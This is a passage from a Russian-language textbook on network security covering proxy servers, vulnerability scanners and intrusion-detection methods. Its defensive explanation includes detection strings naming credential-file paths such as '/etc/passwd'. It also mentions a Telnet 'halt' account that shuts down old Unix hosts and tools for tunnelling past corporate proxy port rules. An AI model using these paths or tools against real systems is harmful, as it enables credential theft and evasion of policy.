внешним миром или между локальными сетями внутри корпоративной
сети замедляется, но цена этому - безопасность.
По архитектуре и наборам выполняемых функций различают два
вида МЭ. В пакетных фильтрах анализируются IP-пакеты и на основе
правил, заложенных при настройке системы, принимается решение,
пропустить ли их далее. Они считаются более гибкими и быстрыми. МЭ
прикладного уровня не пропускают напрямую ни одного пакета. Пакеты
направляются специальному приложению Proxy (доверенный), которое
и решает, устанавливать соединение или нет. Эти МЭ работают медлен-
нее и являются менее гибкими.
Как правило, брандмауэры обеспечивают многоуровневую защиту
и используют механизмы предупреждения, сообщают сетевым менедже-
рам о случаях попытки несанкционированного получения доступа к се-
ти. Необходимо также подчеркнуть, что некоторые МЭ поддерживают
частные виртуальные сети, например, между головным и дочерним офи-
сами через общедоступную сеть.
Не надо доказывать, что самой защищенной сетью является сеть,
которая вообще не подключена к Internet. Однако пользователи такой
сети не смогут работать в Internet, что само по себя является существен-
ным недостатком. Выходом из этого положения может быть подключе-
ние к Internet не всей сети, а лишь одного ее компьютера, как следует
снабженного защитными средствами. Но при этом возникают другие
проблемы (большие очереди и т. п.). Другим выходом из создавшейся
ситуации является установка на этом компьютере специальной про-
граммы, которая позволяла бы остальным компьютерам этой сети эму-
лировать выход в Internet, оставаясь при этом "невидимыми" со стороны
глобальной сети. Такой компьютер называется прокси-сервером.
274
Основное назначение прокси-сервера - это обеспечение трансляции
сетевых адресов, например, когда при помощи одного public IP в Интер-
нет может ходить вся сеть с private IP (10.x.x.x, 172.16.x.x-172.31.x.x,
192.168.x.x). Прокси-сервер при прохождении пакета через него меняет
в этом пакете IP-адрес и номер порта (а при получении ответного пакета
производит те же операции в обратном направлении). Однако, помимо
этой базовой функции, прокси-серверы обычно предлагают еще и мно-
жество других:
 управление разрешениями. Можно определить, каким пользовате-
лям/в какое время/по каким протоколам/к каким Web-ресурсам/в
каком объеме можно выходить в Интернет;
 кэширование - за счет кэширования страниц на прокси-сервере
снижается трафик работы в Интернет и происходит ускорение до-
ступа пользователей;
 протоколирования работы в Интернете. Обычно обращения поль-
зователей в Интернет протоколируются и на основе логов делают-
ся отчеты, которые позволяют например, выяснить, какой из поль-
зователей как поучаствовал в трафике;
 фильтрации трафика - например, режутся баннерные сети, спам-
трафик по SMTP и т.п.
 часто в прокси-сервер встраиваются дополнительные возможно-
сти, например, брандмауэров, средств обнаружения вторжений и
т.п.
Как правило, в настоящее время на предприятии практического лю-
бого размера сейчас используются прокси-серверы для выхода в Интер-
нет. Несколько слов относительно самых распространенных решений:
 самое простое решение, которое встроено во все версии Windows
(и серверные, и клиентские), начиная с Windows 98 SE - это при-
менение Internet Connection Sharing. Это решение самое простое,
но и наименее функциональное. Оно предназначено для совсем
крохотных сетей и практически не поддерживает никаких функ-
ции, кроме прямого - преобразования сетевых адресов. Работать
умеет только с внутренней сетью с IP-адресами 192.168.0.x, а так-
же автоматически выполняет роль DHCP-сервера, раздающего ад-
реса из этой сети. Как правило, администраторов больше волнует
вопрос - как полностью запретить использование ICS на компью-
терах пользователей (чтобы не мог появиться альтернативный
сервер DHCP), чем вопросы его установки и настройки. (Обычно
такое запрещение производится при помощи групповых политик).
275
Многие администраторы считают, что ICS - вообще неработоспо-
собное средство из-за проблем с DNS и соединениями по HTTPS;
 другое решение, встроенное в Windows (только серверные версии
Windows 2000 и 2003) - это служба Network Address Translation
(NAT), которая устанавливается и настраивается как компонент
Routing and Remote Access Server. Это уже более работоспособное
решение, однако функциональность его минимальна - не поддер-
живаются кэширование, разрешения для пользователей и групп,
протоколирование и т.п. Тем не менее по причине простоты и ма-
лых требований к ресурсам этот продукт активно используется на
предприятиях с 10-20 компьютерами;
 наиболее мощное решение от Microsoft - ISA Server 2004 Enterprise
Edition. Именно этим средством пользуются на большинстве
крупных и средних предприятий (в частности, в Санкт-Петербурге
- в Промстройбанке, Сбербанке, Центробанке, КНОС и т.п.). К
преимуществам ISA Server можно отнести:
o масштабируемость и корпоративные возможности (работа в
массивах серверов, совместное использование кэшей и т.п.)
o полная интеграция со средствами аутентификации Windows
(практически только в ISA Server вы можете назначить права
на выход в Интернет пользователям и группам Windows без
необходимости установки дополнительных клиентов аутен-
тификации);
o большое количество программных расширений (в основном
третьих фирм), которые позволяют реализовать большое ко-
личество дополнительных функций (например, ограничить
количество трафика, которое пользователь может скачать в
течение дня), специализированные антивирусные пакеты и
т.п.
o стандартные преимущества продуктов Microsoft - интегра-
ция с операционными системами Windows, доступная доку-
ментация и база знаний, возможность получения поддержки
и т.п.
К недостаткам можно отнести дороговизну ISA, большую ре-
сурсоемкость (рекомендовано 512 Мбайт оперативной памяти и
RAID-массив под файл кэша), недостаточность средств защиты
(обычно вместе с ISA используются дополнительные брандмауэры
и системы обнаружения проникновений).
276
 возможно, самое распространенный прокси-сервер по числу ин-
сталляций в мире - это SQUID, практически стандартный прокси-
сервер для Unix-систем. Он менее ресурсоемок и считается более
надежным и защищенным, чем ISA Server, однако защищенную
аутентификацию стандартными средствами Windows не поддер-
живает. Поскольку в этом курсе рассматриваются только сети
Windows, то SQUID рассматриваться не будет, однако заметим,
что во многих фирмах SQUID работает вместе с ISA - SQUID сто-
ит на входе в локальную сеть предприятия, а ISA - за ним и обес-
печивает раздачу разрешений пользователям и протоколирование
по пользователям;
 из прокси-серверов третьих фирм под Windows к наиболее распро-
страненным продуктам можно отнести WinGate фирмы Qbik и
WinRoute фирмы Kerio (сейчас сведен в один продукт с Kerio
Firewall и переименован в Kerio WinRoute Firewall). Оба этих про-
дукта (а также большое количество других прокси-серверов) нахо-
дятся в каталоге Proxy на компакт-диске.
Помимо прокси-серверов, которые устанавливаются на предприя-
тии и используются для обеспечения выхода пользователей в Интернет,
иногда также используются еще два вида прокси-серверов:
 прокси-сервер провайдера, через которого производится выход в
Интернет. Использование прокси-сервера провайдера часто позво-
ляет повысить скорость работы в Интернете (особенно на нена-
дежных каналах) за счет предварительного кэширования данных у
провайдера. Прокси-сервер, через который можно работать, есть
практически у всех провайдеров и иногда есть смысл протестиро-
вать, не ускорится ли работа при его применении. Информацию о
его IP-адресе, портах, поддерживаемых протоколах нужно полу-
чать у провайдера.
 внешние анонимные прокси-серверы (как платные, так и бесплат-
ные). Они обычно предназначены для сокрытия информации о
пользователе, который выходит в Интернет. Для обеспечения до-
полнительной безопасности работа в Интернете может осуществ-
ляться через цепочку прокси-серверов. Плата за анонимность -
низкая надежность работы таких серверов и существенный проиг-
рыш в скорости. Получить список бесплатных прокси-серверов
можно на странице http://www.spszone.com/anguest/
proxy_links.htm. Кроме того, существуют утилиты, которые позво-
ляют автоматически скачивать из Интернета списки анонимных
277
прокси-серверов, проверять их работоспособность и настраивать
приложения на работу с ними. К таким утилитам относятся,
например, AiS Alive Proxy, Anonimous Guest, GetAnonymous,
ProxyChecker, ProxyHunter и т.п. (все они имеются на компакт-
диске в каталоге Proxy).
Применение прокси настолько удобно, что иногда прокси-сервер
создается даже в том случае, если выход в Интернет производит только
один компьютер (домашний). В этом случае прокси-сервер организуется
прямо на этом компьютере, а все программы, которым нужен в Интер-
нет, выходят через этот прокси (обращаясь обычно к IP-адресу
127.0.0.1). Специализированные программы, которые позволяют созда-
вать такой "локальный" прокси-сервер - например, MyProxy и GetAnon-
ymous. Причина применения таких программ - возможность управления
кэшированием, повышение защищенности, фильтрация трафика и т.п.
Прокси настолько распространены, что трудно представить себе
корпоративную сеть, которая работает в Интернете без прокси-сервера.
Однако при этом часто возникают проблемы, когда из прокси-сервера
открыт выход только через некоторые порты (например, только TCP 80
и UDP 53), а приложение (Web-телефония, средства обмена сообщения-
ми, средства удаленного администрирования и т.п.) требует взаимодей-
ствия через другие порты. Менять конфигурацию часто сложно (напри-
мер, когда есть утвержденная корпоративная политика или когда нет
возможности открыть порты этого приложения, про причине того, что
они выбираются динамически). В этой ситуации можно использовать
утилиты туннелирования трафика приложения через прокси-сервер. Са-
мые распространенные утилиты - HTTPPort для туннелирования через
HTTP-прокси (полностью бесплатная, поставляется с SDK для интегра-
ции в другие приложения) и SocksCap - для туннелирования через Socks-
прокси (также бесплатная).
Мы кратко рассмотрели несколько различных средств обеспечения
безопасности локальных сетей. Более подробно с основными проблема-
ми этого направления и путями их решения можно ознакомиться в [15;
17; 23].
5.6. Средства, методы и типы сканирования состояния

информационной безопасности
Вычислительная сеть состоит из каналов связи, узлов, серверов, ра-
бочих станций, прикладного и системного программного обеспечения,
баз данных и т.д. [17]. Все эти компоненты нуждаются в оценке эффек-
278
тивности их защиты. Средства анализа защищенности исследуют сеть и
ищут "слабые" места в ней, анализируют полученные результаты и на их
основе создают различного рода отчеты. В некоторых системах вместо
"ручного" вмешательства со стороны администратора найденная уязви-
мость будет устраняться автоматически (например, в системе System
Scanner) [19;23]. Перечислим некоторые из проблем, идентифицируемых
системами анализа защищенности (см. рис 50):
"люки" в программах (back door) и программы типа "троянский конь";
слабые пароли;
восприимчивость к проникновению из незащищенных систем;
и т.д.
Проблемы, идентифицируемые системами
анализа защищенности
"люки" в программах (back door) и
программы типа "троянский конь"
слабые пароли
восприимчивость к проникновению
из незащищенных систем
неправильная настройка межсетевых
экранов, Web – серверов и баз данных
и т.д.
Рис. 50. Проблемы, идентифицируемые сканерами защищенности

Технология анализа защищенности является действенным методом
реализации политики сетевой безопасности прежде, чем осуществится
попытка ее нарушения снаружи или изнутри организации.
Системы анализа защищенности (сканеры) предназначены для обна-
ружения только известных уязвимостей, описание которых есть у них в базе
данных. В этом они подобны антивирусным системам, которым для эффек-
тивной работы необходимо постоянно обновлять базу данных сигнатур.
Функционировать такие средства могут на сетевом уровне (network-
based, сетевые сканеры), уровне операционной системы (host-based, си-
стемные сканеры) и уровне приложения (application-based, сканеры при-
ложений) (см. рис. 51).
279
Сканеры безопасности
ISS Internet Scanner

Nessus
сетевые
Net Sonar
CyberCop Scanner
ISS Security Scanner

системные
ISS Security Manager
ISS Database Scanner

приложений
SQL Database Policy
Рис. 51. Классификация сканеров безопасности

Наибольшее распространение получили средства анализа защищен-
ности сетевых сервисов и протоколов (сетевые сканеры). Связано это, в
первую очередь, с универсальностью используемых протоколов. Изу-
ченность и повсеместное использование таких протоколов, как IP, TCP,
HTTP, FTP, SMTP и т.п. позволяют с высокой степенью эффективности
проверять защищенность информационной системы, работающей в дан-
ном сетевом окружении.
Вторыми по распространенности являются средства анализа защи-
щенности операционных систем (системные сканеры). Связано это
также с универсальностью и распространенностью некоторых операци-
онных систем (например, UNIX и Windows NT). Однако из-за того, что
каждый производитель вносит в операционную систему свои изменения
(ярким примером является множество разновидностей ОС UNIX), сред-
ства анализа защищенности ОС анализируют в первую очередь парамет-
ры, характерные для всего семейства одной ОС. И лишь для некоторых
систем анализируются специфичные для нее параметры.
Средств анализа защищенности приложений на сегодняшний день
не так много, как этого хотелось бы. Такие средства пока существуют
только для широко распространенных прикладных систем, типа Web-
броузеры (Netscape Navigator, Microsoft Internet Explorer), СУБД
(Microsoft SQL Server, Sybase Adaptive Server) и т.п.
Помимо обнаружения уязвимостей, при помощи средств анализа
защищенности можно быстро определить все узлы корпоративной сети,
доступные в момент проведения тестирования, выявить все используе-
мые в ней сервисы и протоколы, их настройки и возможности для не-
280
санкционированного воздействия (как изнутри корпоративной сети, так
и снаружи). Также эти средства вырабатывают рекомендации и пошаго-
вые меры, позволяющие устранить выявленные недостатки.
Поскольку наибольшее распространение получили средства, функ-
ционирующие на уровне сети (системы SATAN, Internet Scanner,
CyberCop Scanner, NetSonar и т.д.), то основное внимание будет уделено
именно им.
5.6.1. Механизмы работы сканеров
Существует два основных механизма, при помощи которых сканер

проверяет наличие уязвимости - сканирование (scan) и зондирование
(probe) (см. рис 52).
Механизмы работы сканеров безопасности
Зондирование
Сканирование
(verification)
Методы контроля
Проверка Активные зондирующие

Имитация атак
заголовков проверки
(exploit check)
(banner check) (active probing check)
Рис. 52. Механизмы сканирования

Сканирование - механизм пассивного анализа, с помощью которо-
го сканер пытается определить наличие уязвимости без фактического
подтверждения ее наличия - по косвенным признакам.
Этот метод является наиболее быстрым и простым для реализации.
В терминах компании ISS данный метод получил название "логический
вывод" (inference). Согласно компании Cisco этот процесс идентифици-
рует открытые порты, найденные на каждом сетевом устройстве, и со-
бирает связанные с портами заголовки (banner), найденные при сканиро-
вании каждого порта. Каждый полученный заголовок сравнивается с
281
таблицей правил определения сетевых устройств, операционных систем
и потенциальных уязвимостей. На основе проведенного сравнения дела-
ется вывод о наличии или отсутствии уязвимости.
Зондирование - механизм активного анализа, который позволяет
убедиться, присутствует или нет на анализируемом узле уязвимость.
Зондирование выполняется путем имитации атаки, использующей
проверяемую уязвимость. Этот метод более медленный, чем "сканиро-
вание", но почти всегда гораздо более точный, чем он.
В терминах компании ISS данный метод получил название "под-
тверждение" (verification). Согласно компании Cisco этот процесс ис-
пользует информацию, полученную в процессе сканирования ("логиче-
ского вывода"), для детального анализа каждого сетевого устройства.
Этот процесс также использует известные методы реализации атак для
того, чтобы полностью подтвердить предполагаемые уязвимости и об-
наружить другие уязвимости, которые не могут быть обнаружены пас-
сивными методами, например подверженность атакам типа "отказ в об-
служивании" ("denial of service").
На практике указанные механизмы реализуются следующими не-
сколькими методами.
"Проверка заголовков" (banner check)
Указанный механизм представляет собой ряд проверок типа "ска-
нирование" и позволяет делать вывод об уязвимости, опираясь на ин-
формацию в заголовке ответа на запрос сканера. Типичный пример та-
кой проверки - анализ заголовков программы Sendmail или FTP-сервера,
позволяющий узнать их версию и на основе этой информации сделать
вывод о наличии в них уязвимости.
Наиболее быстрый и простой для реализации метод проверки при-
сутствия на сканируемом узле уязвимости. Однако за этой простотой
скрывается немало проблем.
Эффективность проверок заголовков достаточно эфемерна. И вот
почему.
Во-первых, вы можете изменить текст заголовка, предусмотритель-
но удалив из него номер версии или иную информацию, на основании
которой сканер строит свои заключения. И хотя такие случаи исключи-
тельно редки, пренебрегать ими не стоит. Особенно в том случае, если у
вас работают специалисты в области безопасности, понимающие всю
опасность заголовков "по умолчанию".
Во-вторых, зачастую, версия, указываемая в заголовке ответа на за-
прос, не всегда говорит об уязвимости программного обеспечения. Осо-
282
бенно это касается программного обеспечения, распространяемого вме-
сте с исходными текстами (например, в рамках проекта GNU). Вы може-
те самостоятельно устранить уязвимость путем модификации исходного
текста, при этом забыв изменить номер версии в заголовке.
И в-третьих, устранение уязвимости в одной версии еще не означа-
ет, что в следующих версиях эта уязвимость отсутствует.
Процесс, описанный выше, является первым и очень важным шагом
при сканировании сети. Он не приводит к нарушению функционирова-
ния сервисов или узлов сети. Однако не стоит забывать, что админи-
стратор может изменить текст заголовков, возвращаемых на внешние
запросы.
"Активные зондирующие проверки" (active probing check)
Также относятся к механизму "сканирования". Однако они основа-
ны не на проверках версий программного обеспечения в заголовках, а на
сравнении "цифрового слепка" (fingerprint) фрагмента программного
обеспечения со слепком известной уязвимости.
Аналогичным образом поступают антивирусные системы, сравни-
вая фрагменты сканируемого программного обеспечения с сигнатурами
вирусов, хранящимися в специализированной базе данных. Разновидно-
стью этого метода являются проверки контрольных сумм или даты ска-
нируемого программного обеспечения, которые реализуются в сканерах,
работающих на уровне операционной системы.
Специализированная база данных (в терминах компании Cisco - ба-
за данных по сетевой безопасности) содержит информацию об уязвимо-
стях и способах их использовании (атаках). Эти данные дополняются
сведениями о мерах их устранения, позволяющих снизить риск безопас-
ности в случае их обнаружения. Зачастую эта база данных используется
и системой анализа защищенности и системой обнаружения атак. По
крайней мере, так поступают компании Cisco и ISS.
Этот метод также достаточно быстр, но реализуется труднее, чем
"проверка заголовков".
"Имитация атак" (exploit check)
Данные проверки относятся к механизму "зондирования" и основа-
ны на использовании различных дефектов в программном обеспечении.
Некоторые уязвимости не обнаруживают себя, пока вы не "под-
толкнете" их. Для этого против подозрительного сервиса или узла запус-
каются реальные атаки. Проверки заголовков осуществляют первичный
осмотр сети, а метод "exploit check", отвергая информацию в заголовках,
283
позволяет имитировать реальные атаки, тем самым с большей эффек-
тивностью (но меньшей скоростью) обнаруживая уязвимости на скани-
руемых узлах.
Имитация атак является более надежным способом анализа защи-
щенности, чем проверки заголовков, и обычно более надежны, чем ак-
тивные зондирующие проверки.
Однако существуют случаи, когда имитация атак не всегда может
быть реализована. Такие случаи можно разделить на две категории: си-
туации, в которых тест приводит к "отказу в обслуживании" анализиру-
емого узла или сети, и ситуации, при которых уязвимость в принципе не
годна для реализации атаки на сеть.
Как мы все знаем, многие проблемы защиты не могут быть выявле-
ны без блокирования или нарушения функционирования сервиса или
компьютера в процессе сканирования. В некоторых случаях нежела-
тельно использовать имитацию атак (например, для анализа защищенно-
сти важных серверов), т.к. это может привести к большим затратам (ма-
териальным и временным) на восстановление работоспособности выве-
денных из строя элементов корпоративной сети. В этих случаях жела-
тельно применить другие проверки, например, активное зондирование
или, в крайнем случае, проверки заголовков.
Однако, есть некоторые уязвимости (например, проверка подвер-
женности атакам типа "Packet Storm"), которые просто не могут быть
протестированы без возможного выведения из строя сервиса или ком-
пьютера. В этом случае разработчики поступают следующим образом, -
по умолчанию такие проверки выключены и пользователь может сам
включить их, если желает. Таким образом, например, реализованы си-
стемы CyberCop Scanner и Internet Scanner.
В последней системе такого рода проверки выделены в отдельную
категорию "Denial of service" ("Отказ в обслуживании"). При включении
любой из проверок этой группы система Internet Scanner выдает сооб-
щение "WARNING: These checks may crash or reboot scanned hosts"
("Внимание: эти проверки могут вывести из строя иди перезагрузить
сканируемые узлы").
5.6.2. Этапы сканирования
Практически любой сканер проводит анализ защищенности в не-

сколько этапов (см. рис. 53):
Сбор информации о сети. На данном этапе идентифицируются все
активные устройства в сети и определяются запущенные на них сервисы
284
Этапы сканирования
Сбор информации о сети
Обнаружение потенциальных уязвимостей
Подтверждение выбранных уязвимостей
Генерация отчета
Автоматическое устранение уязвимостей
Рис. 53. Этапы сканирования

и демоны. В случае использования систем анализа защищенности на
уровне операционной системы данный этап пропускается, поскольку на
каждом анализируемом узле установлены соответствующие агенты си-
стемного сканера.
Обнаружение потенциальных уязвимостей. Сканер использует
описанную выше базу данных для сравнения собранных данных с из-
вестными уязвимостями при помощи проверки заголовков или активных
зондирующих проверок. В некоторых системах все уязвимости ранжи-
руются по степени риска. Например, в системе NetSonar уязвимости де-
лятся на два класса: сетевые и локальные уязвимости. Сетевые уязвимо-
сти (например, воздействующие на маршрутизаторы) считаются более
серьезными по сравнению с уязвимостями, характерными только для ра-
бочих станций. Аналогичным образом "поступает" и Internet Scanner.
Все уязвимости в нем делятся на три степени риска: высокая (High),
средняя (Medium) и низкая (Low).
Подтверждение выбранных уязвимостей. Сканер использует спе-
циальные методы и моделирует (имитирует) определенные атаки для
подтверждения факта наличия уязвимостей на выбранных узлах сети.
285
Генерация отчетов. На основе собранной информации система
анализа защищенности создает отчеты, описывающие обнаруженные
уязвимости. В некоторых системах (например, Internet Scanner и
NetSonar) отчеты создаются для различных категорий пользователей,
начиная от администраторов сети и заканчивая руководством компании.
Если первых в первую очередь интересуют технические детали, то для
руководства компании необходимо представить красиво оформленные с
применением графиков и диаграмм отчеты с минимумом подробностей.
Немаловажным аспектом является наличие рекомендаций по устране-
нию обнаруженных проблем. И здесь по праву лидером является систе-
ма Internet Scanner, которая для каждой уязвимости содержит пошаговые
инструкции для устранения уязвимостей, специфичные для каждой опе-
рационной системы. Во многих случаях отчеты также содержат ссылки
на FTP- или Web-сервера, содержащие patch'и и hotfix'ы, устраняющие
обнаруженные уязвимости.
Автоматическое устранение уязвимостей. Этот этап очень редко
реализуется в сетевых сканерах, но широко применяется в системных
сканерах (например, System Scanner). При этом данная возможность мо-
жет реализовываться по-разному. Например, в System Scanner создается
специальный сценарий (fix script), который администратор может запу-
стить для устранения уязвимости. Одновременно с созданием этого сце-
нария, создается и второй сценарий, отменяющий произведенные изме-
нения. Это необходимо в том случае, если после устранения проблемы
нормальное функционирование узла было нарушено. В других системах
возможности "отката" не существует.
В любом случае у администратора, осуществляющего поиск уязви-
мостей, есть несколько вариантов использования системы анализа
защищенности:
 запуск сканирования только с проверками на потенциальные уяз-
вимости (этапы 1,2 и 4). Это дает предварительное ознакомление с
системами в сети. Этот метод является гораздо менее разрушитель-
ным по сравнению с другими и также является самым быстрым;
 запуск сканирования с проверками на потенциальные и подтвер-
жденные уязвимости. Этот метод может вызвать нарушение рабо-
ты узлов сети во время реализации проверок типа "exploit check";
 запуск сканирования с вашими пользовательскими правилами для
нахождения конкретной проблемы;
 все из вышеназванного.
286
5.6.3. Особенности применения сканеров
Если сканер не находит уязвимостей на тестируемом узле, то это

еще не значит, что их нет. Просто сканер не нашел их.
И зависит это не только от самого сканера, но и от его окружения.
Например, если Вы тестируете сервис Telnet или FTP на удаленной ма-
шине, и сканер сообщает Вам, что уязвимостей не обнаружено - это мо-
жет значить не только, что уязвимостей нет, а еще и то, что на сканиру-
емом компьютере установлен, например, TCP Wrapper. Да мало ли еще
чего? Вы можете пытаться получить доступ к компьютеру через межсе-
тевой экран или попытки доступа блокируются соответствующими
фильтрами у провайдера и т.д.
Для ОС Windows NT характерен другой случай. Сканер пытается
дистанционно проанализировать системный реестр (registry). Однако в
случае запрета на анализируемом узле удаленного доступа к реестру,
сканер никаких уязвимостей не обнаружит. Существуют и более слож-
ные случаи.
И вообще различные реализации одного итого же сервиса по-
разному реагируют на системы анализа защищенности. Очень часто на
практике можно увидеть, что сканер показывает уязвимости, которых на
анализируемом узле нет. Это относится к сетевым сканерам, которые
проводят дистанционный анализ узлов сети. И удаленно определить,
существует ли в действительности уязвимость или нет, практически не-
возможно. В этом случае можно порекомендовать использовать систему
анализа защищенности на уровне операционной системы, агенты кото-
рой устанавливаются на каждый контролируемый узел и проводят все
проверки локально.
Для решения этой проблемы некоторые компании-производители
пошли по пути предоставления своим пользователям нескольких систем
анализа защищенности, работающих на всех указанных выше уровнях, -
сетевом, системном и уровне приложений. Совокупность этих систем
позволяет с высокой степенью эффективности обнаружить практически
все известные уязвимости. Например, компания Internet Security Systems
предлагает семейство SAFEsuite, состоящее из четырех сканеров:
Internet Scanner, System Scanner, Security Manager и Database Scanner.
В настоящий момент это единственная компания, которая предлага-
ет системы анализа защищенности, функционирующие на всех трех
уровнях информационной инфраструктуры. Другие компании предлага-
287
ют или два (Axent) или, как правило, один (Network Associates, NetSonar
и др.) сканер.
Компания Cisco, предлагающая только систему анализа защищен-
ности на уровне сети пошла другим путем для устранения проблемы
ложного срабатывания. Она делит все уязвимости на два класса:
 Потенциальные - вытекающие из проверок заголовков и т.н. ак-
тивных "подталкиваний" (nudge) анализируемого сервиса или уз-
ла. Потенциальная уязвимость возможно существует в системе, но
активные зондирующие проверки не подтверждают этого.
 Подтвержденные - выявленные и существующие на анализируе-
мом хосте.
Проверки на потенциальную уязвимость проводятся через коллек-
цию заголовков и использование "несильных подталкиваний". "Подтал-
кивание" используется для сервисов, не возвращающих заголовки, но
реагирующих на простые команды, например, посылка команды HEAD
для получения версии HTTP-сервера. Как только эта информация полу-
чена, система NetSonar использует специальный механизм (rules engine),
который реализует ряд правил, определяющих, существует ли потенци-
альная уязвимость.
Таким образом, администратор знает, какие из обнаруженных уяз-
вимостей действительно присутствуют в системе, а какие требуют под-
тверждения.
Однако в данном случае остаются уязвимости, с трудом обнаружи-
ваемые или совсем не обнаруживаемые через сеть. Например, проверка
"слабости" паролей, используемых пользователями и другими учетными
записями. В случае использования сетевого сканера вам потребуется за-
тратить очень много времени на удаленную проверку каждой учетной
записи. В то же время, аналогичная проверка, осуществляемая на ло-
кальном узле, проводится на несколько порядков быстрее. Другим при-
мером может служить проверка файловой системы сканируемого узла.
Во многих случаях ее нельзя осуществить дистанционно.
Достоинства сканирования на уровне ОС кроются в прямом доступе
к низкоуровневым возможностям ОС хоста, конкретным сервисам и де-
талям конфигурации. Тогда как сканер сетевого уровня имитирует ситу-
ацию, которую мог бы иметь внешний злоумышленник, сканер систем-
ного уровня может рассматривать систему со стороны пользователя, уже
имеющего доступ к анализируемой системе и имеющего в ней учетную
запись. Это является наиболее важным отличием, поскольку сетевой
288
сканер по определению не может предоставить эффективного анализа
возможных рисков деятельности пользователя.
Многие сканеры используют более чем один метод проверки одной
и той же уязвимости или класса уязвимостей. Однако в случае большого
числа проверок использование нескольких методов поиска одной уязви-
мости привносит свои проблемы. Связано это со скоростью проведения
сканирования.
Например, различие между системами CyberCop Scanner и Internet
Scanner в том, что разработчики из NAI никогда не добавят в свой про-
дукт проверку, если не могут с уверенностью сказать, что проверка
надежно обнаруживает уязвимость. В то время как разработчики ISS по-
полняют свою базу даже в том случае, если их проверка обнаруживает
уязвимость с некоторой точностью. Затем, уже после выпуска системы,
происходит возврат к разработанным проверкам, их улучшение, добавле-
ние новых механизмов осуществления проверок той же уязвимости для
повышения достоверности, и т.д. Достаточно спорный вопрос, что лучше.
С одной стороны лучше, когда вы с уверенностью можете сказать,
что на анализируемом узле определенной уязвимости нет.
С другой, даже если существует хоть небольшой шанс, что вы мо-
жете обнаружить уязвимость, то надо этим шансом воспользоваться. В
любом случае наиболее предпочтительным является проверка типа
"имитация атак", которая обеспечивает наибольший процент точного
обнаружения уязвимостей.
Не все проверки, разработанные в лабораторных условиях, функци-
онируют так, как должны. Даже, несмотря на то, что эти проверки те-
стируются, прежде чем будут внесены в окончательную версию сканера.
На это могут влиять некоторые факторы:
 особенности конфигурации пользовательской системы;
 способ, которым был скомпилирован анализируемый демон или
сервис;
 ошибки удаленной системы;
 и т.д.
В таких случаях автоматическая проверка может пропустить уязви-
мость, которая легко обнаруживается вручную и которая может быть
широко распространена во многих системах. Проверка заголовка в сово-
купности с активным зондированием в таком случае может помочь
определить подозрительную ситуацию, сервис или узел. И хотя уязви-
мость не обнаружена, еще не значит, что ее не существует. Необходимо
289
другими методами, в т.ч. и неавтоматизированными, исследовать каж-
дый подозрительный случай.
5.6.4. Особенности реализации сканеров
Системы различных производителей могут использовать различные

методы поиска одной и той же уязвимости, что может привести к ее
нахождению в случае использования одного средства и ненахождения -
в случае другого.
Кроме того, если в созданном отчете не сказано о той или иной уяз-
вимости, то иногда стоит обратиться к журналам регистрации (log) си-
стемы анализа защищенности. В некоторых случаях, когда сканер не
может со 100%-ой уверенностью определить наличие уязвимости, он не
записывает эту информацию в отчет, однако сохраняет ее в логах.
Например, анализ и разбор поля sysDescr в журнале регистрации систе-
мы Internet Scanner существенно помогает во многих спорных случаях.
Существуют различия и между тем, как влияет одна и та же провер-
ка на различные версии сервисов в различных операционных системах.
Например, использование учетной записи halt для демона Telnet на не-
которых компьютерах под управлением Unix или Windows NT не приве-
дет к плачевным последствиям, в то время как на старых версиях Unix
это вызовет запуск команды /bin/halt при попытке доступа к удаленной
системе с использованием этой учетной записи.
5.7. Методы и средства обнаружения удаленных атак
5.7.1. Методы, используемые для получения информации об

атаках
Если система обнаружения уязвимостей не выявила уязвимость, это
не значит что система может противостоять атакам. В реальном масшта-
бе времени необходимо использовать системы обнаружения атак для
оперативного выявления атаки и реагирования на нее. В данном вопросе
речь пойдет о методах, используемых для получения информации об
атаках [19].
Как бы ни называли производители или исследовательские лабора-
тории механизмы обнаружения атак, используемые в своих продуктах,
все они основаны на нескольких общих методах. Необходимо заметить,
что все нижеописанные методы не являются взаимоисключающими. Во
290
многих системах используется комбинация нескольких методов. Данные
методы приведены на рис. 54.
Анализ журналов регистрации
Этот один из самых первых реализованных методов обнаружения
атак. Он заключается в анализе журналов регистрации (log, audit trail),
создаваемых операционной системой, прикладным программным обес-
печением, маршрутизаторами и т.д. Записи журнала регистрации анали-
зируются и интерпретируются системой обнаружения атак.
Анализ журналов регистрации
Методы, Анализ "на лету"

используемые
для
получения
информации
об атаках Использование профилей
"нормального" поведения
Использование сигнатур атак
Рис. 54. Методы, используемые для получения информации об

атаках
К достоинствам этого метода относится простота его реализации.
Однако за этой простотой скрывается немало недостатков:
для достоверного обнаружения той или иной подозрительной дея-
тельности необходима регистрация в журналах большого объема дан-
ных, что отрицательно сказывается на скорости работы контролируемой
системы;
при анализе журналов регистрации очень трудно обойтись без по-
мощи специалистов, что существенно снижает круг распространения
этого метода;
до настоящего момента нет унифицированного формата хранения
журналов.
И хотя работы в этой области ведутся, например, в лаборатории
COAST или в компании WebTrends, до их завершения еще очень далеко.
291
Анализ уже записанных в журнал регистрации записей говорит о том,
что анализ осуществляется не в реальном режиме времени. Это свиде-
тельствует о том, что данные системы не могут быть применены для
раннего обнаружения атак в процессе их развития. И самый очевидный
недостаток - они не могут обнаружить атаки, которые направлены на уз-
лы, не использующие журналы регистрации, или для которых не суще-
ствует соответствующей реализации агента.
Как правило, анализ журналов регистрации является дополнением к
другим методам обнаружения атак, в частности, к обнаружению атак "на
лету". Использование этого метода позволяет проводить "разбор поле-
тов" уже после того, как была зафиксирована атака, для того чтобы вы-
работать эффективные меры предотвращения аналогичных атак в буду-
щем.
Анализ "на лету"
Этот метод заключается в мониторинге сетевого трафика в реаль-
ном или близком к реальному времени и использовании соответствую-
щих алгоритмов обнаружения. Очень часто используется механизм по-
иска в трафике определенных строк, которые могут характеризовать не-
санкционированную деятельность. К таким строкам можно отнести
'\\WINNT\SYSTEM32\CONFIG' (данная строка описывает путь к файлам
SAM, Security и т.д.) или '/etc/passwd' (данная строка описывает путь к
списку паролей ОС Unix)
Использование метода обнаружения атак в сетевом трафике дает
несколько основных преимуществ:
один агент системы обнаружения атак может просматривать целый
сегмент сети с многочисленными хостами, в то время как, для предыду-
щего метода необходимо на каждый анализируемый узел устанавливать
свой агент. Этот метод позволяет обнаруживать атаки против всех эле-
ментов сети предприятия, начиная от атак на маршрутизаторы и закан-
чивая атаками на прикладные приложения.
системы, построенные с учетом этого метода, могут определять
атаки в реальном масштабе времени и останавливать атаки до достиже-
ния ими цели;
невозможность злоумышленнику скрыть следы своей деятельности.
Системы обнаружения атак сетевого уровня используют "живой" трафик
